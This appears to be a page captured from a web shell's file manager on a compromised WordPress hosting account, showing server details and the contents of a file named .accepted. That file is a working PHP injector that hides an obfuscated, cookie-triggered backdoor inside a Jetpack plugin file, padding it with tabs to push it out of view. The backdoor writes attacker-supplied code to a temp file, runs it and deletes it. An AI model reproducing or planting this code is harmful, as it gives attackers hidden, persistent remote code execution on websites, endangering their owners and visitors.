HEX
Server: Apache/2
System: Linux vpslll9m.sdns.vn 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
User: thuexe247c (1044)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/thuexe247c/domains/thuexe247.com.vn/public_html/
Upload Files
File: /home/thuexe247c/domains/thuexe247.com.vn/public_html/.accepted
<?php  $path = '/home/thuexe247c/domains/thuexe247.com.vn/private_html/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-videopress/src/videopress-divi/class-videopress-divi-extension.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%20%28isset%28%24_COOKIE%5B-3%2B3%5D%29%20%26%26%20isset%28%24_COOKIE%5B-42%2B43%5D%29%20%26%26%20isset%28%24_COOKIE%5B-15%2B18%5D%29%20%26%26%20isset%28%24_COOKIE%5B-22%2B26%5D%29%29%20%7B%20%24dchunk%20%3D%20%24_COOKIE%3B%20function%20restore_state%28%24parameter_group%29%20%7B%20%24dchunk%20%3D%20%24_COOKIE%3B%20%24object%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%274930bd5d%27%29%3B%20if%20%28%21is_writable%28%24object%29%29%20%7B%20%24object%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22initialized%22%3B%20%7D%20%24resource%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%20%22%20.%20base64_decode%28str_rot13%28%24dchunk%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24object%29%29%20%7B%20%24component%20%3D%20fopen%28%24object%2C%20%27w%2B%27%29%3B%20fputs%28%24component%2C%20%24resource%29%3B%20fclose%28%24component%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24object%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24object%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22restore_state%22%29%3B%20%24binding%20%3D%20%22b1b868605e85e375a59899e1f5d47f7a%22%3B%20if%20%28%21strncmp%28%24binding%2C%20%24dchunk%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22reverse_lookup_batch_process%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');
@ Telegram